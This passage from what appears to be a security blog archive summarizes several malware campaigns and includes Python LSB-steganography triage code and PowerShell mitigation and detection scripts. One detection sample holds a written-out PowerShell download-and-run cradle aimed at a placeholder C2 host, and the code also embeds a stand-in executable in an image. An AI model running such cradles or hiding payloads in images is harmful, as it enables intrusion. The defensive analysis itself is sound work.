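    return _lsb_bytes(rgb, n, offset=32)


def lsb_ones_ratio(rgb: bytes, span: int = 0) -> float:
    """Fraction of set LSBs over the first `span` channels (0 = whole image).
    Compressed/encrypted payloads push this toward 0.5; a flat-shaded graphic
    sits far from it. Natural photos are already near 0.5, so treat this as a
    triage signal, never as proof on its own."""
    sample = rgb[:span] if span else rgb
    return sum(b & 1 for b in sample) / len(sample)


def triage(png: bytes) -> dict:
    """Checks an analyst would run on a suspect PNG under the assumed layout."""
    _, _, rgb = read_png(png)
    try:
        payload = extract_lsb(rgb)
        span = 32 + len(payload) * 8
    except ValueError:  # no plausible length prefix: fall back to whole plane
        payload, span = b"", 0
    return {"payload_len": len(payload),
            "lsb_ones_ratio": round(lsb_ones_ratio(rgb, span), 4),
            "pe_header": payload[:2] == b"MZ"}  # an MZ/PE file hidden in the picture


def constructed_image() -> bytes:
    """Constructed flat-shaded test image: every channel value is even, so the
    LSB plane is all zero before anything is hidden in it."""
    return bytes((x * 2, y * 2, 128)[c]
                 for y in range(HEIGHT) for x in range(WIDTH) for c in range(3))


# Constructed stand-in for a hidden executable: an MZ header followed by filler.
PAYLOAD = b"MZ" + bytes(range(256)) * 2


def stego_png() -> bytes:
    """Embed PAYLOAD into the constructed image and return the resulting PNG."""
    return write_png(WIDTH, HEIGHT, embed_lsb(constructed_image(), PAYLOAD))


if __name__ == "__main__":
    print("clean:", triage(write_png(WIDTH, HEIGHT, constructed_image())))
    print("stego:", triage(stego_png()))
```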

No matter how the third-stage implant is deployed, it is clear that Worok has intelligence-gathering objectives that go beyond simply harvesting files of interest.

Worok attacks use tools that are not circulating in the wild, so these tools are likely used exclusively by the group itself to conduct its attacks.

Indicators of Compromise

PNG file with steganographically embedded C# payload

29A195C5FF1759C010F697DC8F8876541651A77A7B5867F4E160FD8620415977
9E1C5FF23CD1B192235F79990D54E6F72ADBFE29D20797BA7A44A12C72D33B86
AF2907FC02028AC84B1AF8E65367502B5D9AF665AE32405C3311E5597C9C2774

DropBoxControl

1413090EAA0C2DAFA33C291EEB973A83DEB5CBD07D466AFAF5A7AD943197D726

Codes, Ciphers, Steganography & Secret Messages

Tags: Steganography


Nov 14 2022

Researchers Sound Alarm on Dangerous BatLoader Malware Dropper

Category: Information Security, Malware | DISC @ 11:36 pm

BatLoader has spread rapidly to roost in systems globally, tailoring payloads to its victims.


https://www.darkreading.com/attacks-breaches/researchers-alarm-batloader-malware-dropper

Tags: Malware


Nov 10 2022

Malicious Chrome Plugin Let Remote Attacker Steal keystroke and Inject Malicious Code

Category: Malware, Web Security | DISC @ 11:38 am

Researchers at Zimperium zLabs recently identified a new Chrome browser botnet called ‘Cloud9’ that uses malicious extensions to do the following:-

  • Steal online account credentials
  • Log keystrokes
  • Inject ads
  • Inject malicious JS code
  • Enroll the victim’s browser in DDoS attacks

Web browsers are becoming an increasingly attractive target for malware developers because they hold the most valuable information about a user.

Our everyday keystrokes and session cookies reveal a great deal about us, and access to such information can lead to a security breach or a violation of privacy.

Cloud9 botnet is a RAT that affects all Chromium-based web browsers, which are popular among consumers like Chrome and Microsoft Edge. Moreover, threat actors could exploit this RAT to remotely execute arbitrary commands.

Technical Analysis

The official Chrome web store doesn’t host this malicious Chrome extension, so it cannot be downloaded from there. 

The malware is distributed through communities operated by threat actors: users of the tool hide the malware in an extension before the tool delivers it to the victims.

The extension consists of only three JavaScript files, and most of its functionality is located in a file called “campaign.js”.

According to the report, during the initialization of campaign.js the window.navigator API is used to identify the system’s operating system. Once the target has been identified, a JavaScript file is injected into the victim’s system to mine cryptocurrency using the victim’s computing resources.

Next, for further proceedings, it injects another script known as cthulhu.js which comprises a full-chain exploit for the following flaws:-

  • CVE-2019-11708 (Firefox)
  • CVE-2019-9810 (Firefox)
  • CVE-2014-6332 (Internet Explorer)
  • CVE-2016-0189 (Internet Explorer)
  • CVE-2016-7200 (Edge)

As soon as the vulnerabilities are exploited, Windows malware is automatically installed on the host machine and executed. This gives attackers even more opportunities to compromise systems and carry out even more severe malware attacks.

One of the more sophisticated components of this malware is “Clipper,” a module that continuously scans the system clipboard for copied data such as:-

  • Passwords
  • Credit cards details

In addition to injecting ads into webpages silently, Cloud9 is also capable of generating revenue for its operators by generating ad impressions.

Cloud9 Botnet Functionalities

Malicious Chrome Plugin Let Remote Attacker Steal keystroke and Inject Malicious Code

Tags: Malicious Chrome Plugin


Oct 31 2022

Active Raspberry Robin Worm Launch a ‘Hands-on-Keyboard’ Attacks To Hack Entire Networks

Category: Malware | DISC @ 12:47 pm

During recent research, Microsoft has discovered evidence of a complex interconnected malware ecosystem that is associated with the Raspberry Robin worm.

Several links between the Raspberry Robin worm and other malware families were identified, and security experts have also found that it uses alternative infection tactics.

Infections like these lead to a variety of follow-on activity, listed below:-

  • Hands-on-keyboard attacks: When attackers are already inside your environment following a breach, a hands-on keyboard attack will occur. It is a two-sided operation; on one end it’s the cybercriminal who sits at a keyboard, while on the other side it’s your compromised network that is being accessed.
  • Human-operated ransomware activity: It occurs when cybercriminals are involved in an active attack on a victim. Using this approach, an organization’s on-premises infrastructure is penetrated, privileges are elevated, and ransomware is deployed by the threat actors.

Compromised 1,000 Organizations

In the past 30 days, the Raspberry Robin worm has triggered payload alerts on 3,000 devices across more than 1,000 organizations. In some instances, the Raspberry Robin worm has been installed on victims’ systems alongside malware called FakeUpdates.

Raspberry Robin is also known as QNAP Worm because it uses compromised QNAP storage servers for command-and-control. It spreads to other devices through infected USB drives containing malicious .LNK files.

The worm spawns a msiexec process via cmd[.]exe as soon as a USB device is attached.

To reach its C2 servers, the malware communicates through compromised Windows devices.

Raspberry Robin’s Connection

In October 2022, the Microsoft Security Threat Intelligence Center (MSTIC) observed Raspberry Robin being used by DEV-0950, another actor involved in post-compromise activity.

DEV-0950 activity led to hands-on-keyboard Cobalt Strike compromises. The majority of DEV-0950’s victims are traditionally acquired via phishing scams.

However, the operators of DEV-0950 have moved to use Raspberry Robin instead of the traditional method. The advantage of this approach is that the payloads can be delivered to existing infections and the campaigns can move to the stage of ransomware more quickly.

Mitigations

To mitigate the impact of this threat, defenders can apply the following mitigation measures:-

  • Prevent autorun and code execution when a removable drive is mounted.
  • Make sure the tamper protection setting is enabled in order to protect Microsoft Defender Antivirus from being interrupted by attacks.
  • It is very important to turn on cloud-delivered protection for Microsoft Defender Antivirus or your antivirus software counterpart if it supports the feature.
  • The USB port should be blocked from running untrusted or unsigned processes.
  • Scripts that may be obfuscated should be blocked from being executed.
  • It is imperative to block executable files from running unless they fulfill all the trusted criteria.
  • The local security authority subsystem of Windows should be protected against credential theft.
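The mitigation list above maps onto a handful of Windows settings. The script below is an added example, not part of the Microsoft report or the original post; it assumes an elevated PowerShell session on a host running Microsoft Defender Antivirus, and the ASR rule GUIDs are Microsoft's published rule identifiers.

```powershell
# Added example (not from the Microsoft report): applies the listed mitigations
# on a Windows host running Microsoft Defender Antivirus. Run from an elevated
# PowerShell session.

# 1. Disable autorun/autoplay for every drive type (Explorer policy keys).
$explorerPolicy = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
New-Item -Path $explorerPolicy -Force | Out-Null
Set-ItemProperty -Path $explorerPolicy -Name NoDriveTypeAutoRun -Type DWord -Value 0xFF
Set-ItemProperty -Path $explorerPolicy -Name NoAutorun          -Type DWord -Value 1

# 2. Cloud-delivered protection: report to MAPS, submit samples, block aggressively.
Set-MpPreference -MAPSReporting Advanced
Set-MpPreference -SubmitSamplesConsent SendAllSamples
Set-MpPreference -CloudBlockLevel High

# 3. Attack surface reduction rules covering the remaining bullet points.
$asrRules = @{
    'b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4' = 'Block untrusted and unsigned processes that run from USB'
    '5beb7efe-fd9a-4556-801d-275e5ffc04cc' = 'Block execution of potentially obfuscated scripts'
    '01443614-cd74-433a-b99e-2ecdc07bfc25' = 'Block executables unless they meet prevalence, age or trusted-list criteria'
    '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2' = 'Block credential stealing from the LSASS subsystem'
}
foreach ($id in $asrRules.Keys) {
    # Use -AttackSurfaceReductionRules_Actions AuditMode first to measure impact before blocking.
    Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions Enabled
    Write-Host "Enabled ASR rule: $($asrRules[$id])"
}

# 4. Tamper protection cannot be switched on with Set-MpPreference; it is managed
#    through Windows Security or Intune. Verify the current state instead.
$status = Get-MpComputerStatus
if (-not $status.IsTamperProtected) {
    Write-Warning 'Tamper protection is OFF; enable it via Windows Security or Intune.'
}

# 5. Read back the effective ASR configuration (action 1 = Block, 2 = Audit, 6 = Warn).
$pref = Get-MpPreference
for ($i = 0; $i -lt $pref.AttackSurfaceReductionRules_Ids.Count; $i++) {
    '{0}  action={1}' -f $pref.AttackSurfaceReductionRules_Ids[$i], $pref.AttackSurfaceReductionRules_Actions[$i]
}
```

Roll the ASR rules out in audit mode on a pilot group before switching them to Enabled, since the prevalence/age rule in particular can block legitimate in-house binaries.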

Tags: Active Raspberry Robin Worm, Malware


Sep 26 2022

Chromeloader Malware Drops Malicious Browser Extensions to Track User’s Online Activity

Category: Malware | DISC @ 12:11 pm

Microsoft and VMware have warned of an ongoing, widespread Chromeloader malware campaign. The campaign has been observed dropping node-WebKit malware and ransomware, as well as dangerous browser extensions.

ChromeLoader was observed in the wild for the first time in January 2022 for Windows users and in March 2022 for Mac users by the VMware Carbon Black Managed Detection and Response (MDR) team.

The ChromeLoader is one of the most widespread and persistent malware programs on the web. A surge in Chromeloader infections occurred in Q1 2022, with the cybersecurity researchers from Red Canary theorizing the malware was used by affiliate marketers and advertisers to defraud them of their money.

To perform click fraud and earn money for the threat actors, the malware infects Chrome with a malicious extension in order to redirect user traffic to advertising websites.

Technical Analysis

The campaign was traced back to a threat actor tracked as DEV-0796, which used Chromeloader to infect victims with several different types of malware.

Several variants of ChromeLoader are also known, such as ChromeBack and Choziosi Loader.

The malware called ChromeLoader is delivered in the form of ISO files that may be downloaded from any of the following sources:-

  • Malicious ads
  • Browser redirects
  • YouTube video comments

Since Microsoft began blocking Office macros by default, ISO files have become one of the most popular methods of distributing malware.

Additionally, Windows 10 and later automatically mount ISO files as CDROMs when double-clicking them. By doing so, they provide an efficient method for disseminating multiple malware files simultaneously.

There are four files that are commonly included in ChromeLoader ISOs:-

  • A ZIP archive containing the malware
  • An ICON file
  • A batch file (commonly named Resources.bat) 

A batch file is then created, which launches a batch program, and is installed along with the malware.

Chromeloader Malware Drops Malicious Browser Extensions to Track User’s Online Activity

Tags: Chromeloader


Aug 30 2022

Three campaigns delivering multiple malware, including ModernLoader and XMRig miner

Category: Malware | DISC @ 8:27 am

Researchers spotted three campaigns delivering multiple malware, including ModernLoader, RedLine Stealer, and cryptocurrency miners

Cisco Talos researchers observed three separate, but related, campaigns between March and June 2022 that were delivering multiple malware, including the ModernLoader bot (aka Avatar bot), RedLine info-stealer and cryptocurrency miners to victims.

ModernLoader is a .NET remote access trojan that supports multiple features, including the capability of gathering system information, executing arbitrary commands, or downloading and running a file from the C2 server.

ModernLoader

Threat actors use PowerShell, .NET assemblies, and HTA and VBS files to perform lateral movements across a targeted network and eventually drop other pieces of malware, such as the SystemBC trojan and DCRAT. The attackers’ use of a variety of off-the-shelf tools makes it difficult to attribute this activity to a specific adversary.

The attack chain starts with an HTML Application (HTA) file that runs a PowerShell script hosted on the C2 server which executes the next stage of the loading process.

“The next stage is the PowerShell loader. The loader contains embedded code of three modules, which are loaded using reflection as additional .NET assemblies into the PowerShell process space. The downloaded PowerShell code also downloads and runs auxiliary modules and payloads.” reads the analysis published by Cisco Talos. “There are usually three modules in this loader format. The first disables AMSI scanning functionality, the second is the final payload, and the last injects the payload into the process space of a newly created process, usually RegSvcs.exe.”

The final payload appears to be a ModernLoader remote access trojan (RAT) and the XMRig miner. Talos reported that the March campaigns targeted users in Eastern Europe, including Bulgaria, Poland, Hungary, and Russia.
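The attack chain described above (HTA file, PowerShell loader, payload injected into RegSvcs.exe) gives a defender two concrete parent/child process pairs to look for. The function below is an added example, not Cisco Talos' code; it runs over constructed process-creation records and assumes the field names Sysmon Event ID 1 uses (ParentImage, Image, CommandLine, UtcTime).

```powershell
# Added example (not from the Talos report): flags process-creation records that
# match the ModernLoader chain. Sample records below are constructed, not real telemetry;
# in production feed it Sysmon Event ID 1 (or Security 4688) events with the same fields.

function Find-ModernLoaderChain {
    param([Parameter(Mandatory)][object[]]$Events)

    # Parent -> child pairs taken from the chain described on the page.
    $suspiciousPairs = @(
        @{ Parent = 'mshta.exe';      Child = 'powershell.exe'; Why = 'HTA file launching the PowerShell loader' },
        @{ Parent = 'powershell.exe'; Child = 'regsvcs.exe';    Why = 'loader spawning RegSvcs.exe as injection host' }
    )
    foreach ($e in $Events) {
        $parent = [IO.Path]::GetFileName($e.ParentImage).ToLower()
        $child  = [IO.Path]::GetFileName($e.Image).ToLower()
        foreach ($p in $suspiciousPairs) {
            if ($parent -eq $p.Parent -and $child -eq $p.Child) {
                [pscustomobject]@{ Time = $e.UtcTime; ParentImage = $e.ParentImage
                                   Image = $e.Image; CommandLine = $e.CommandLine; Reason = $p.Why }
            }
        }
        # A download cradle or encoded command in a PowerShell command line is a second indicator
        # of the "script hosted on the C2 server" stage. The pattern is deliberately broad; tune it.
        if ($child -eq 'powershell.exe' -and $e.CommandLine -match 'DownloadString|IEX|Invoke-Expression|-enc') {
            [pscustomobject]@{ Time = $e.UtcTime; ParentImage = $e.ParentImage
                               Image = $e.Image; CommandLine = $e.CommandLine
                               Reason = 'remote script download or encoded command in PowerShell' }
        }
    }
}

# Constructed sample records (C2 host is a placeholder, not a real indicator).
$sample = @(
    [pscustomobject]@{ UtcTime = '2022-03-14 09:12:01'; ParentImage = 'C:\Windows\System32\mshta.exe'
                       Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://C2-PLACEHOLDER/stage2.ps1'')"' }
    [pscustomobject]@{ UtcTime = '2022-03-14 09:12:05'; ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       Image = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'; CommandLine = 'RegSvcs.exe' }
    [pscustomobject]@{ UtcTime = '2022-03-14 09:15:00'; ParentImage = 'C:\Windows\explorer.exe'
                       Image = 'C:\Windows\System32\notepad.exe'; CommandLine = 'notepad.exe' }
)
Find-ModernLoaderChain -Events $sample | Format-Table -AutoSize
```

Against the sample the first record is reported twice (parent/child pair plus download cradle), the second once, and the notepad record not at all.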

The threat actors behind the campaigns are likely Russian-speaking actors who are experimenting with different technologies. Experts suggest that the use of ready-made tools shows that, although the actors understand the TTPs required for a successful malware campaign, they lack the technical skills to develop their own arsenal.

Cisco Talos attributed the infections to a previously undocumented but Russian-speaking threat actor, citing the use of off-the-shelf tools. Potential targets included Eastern European users in Bulgaria, Poland, Hungary, and Russia.

The attackers also compromised vulnerable web applications to change their configuration to use malicious PHP scripts to deliver malware to their users.

The attackers attempted to compromise WordPress and cPanel installs to distribute the malware using files masquerading as Amazon gift cards.

“The actor is frequently using open-source components and code generators to achieve its goals. A number of remote access tools, stealers and cryptominers are used in the campaigns to eventually reap financial benefits for the actor. The actor has an interest in alternative distribution channels such as compromised web applications, archive infections and spreading by using Discord webhooks.” concludes the report. “Despite all the techniques and tactics used we estimate that the success of these campaigns is limited.”

Malware Analysis

Tags: ModernLoader, XMRig miner

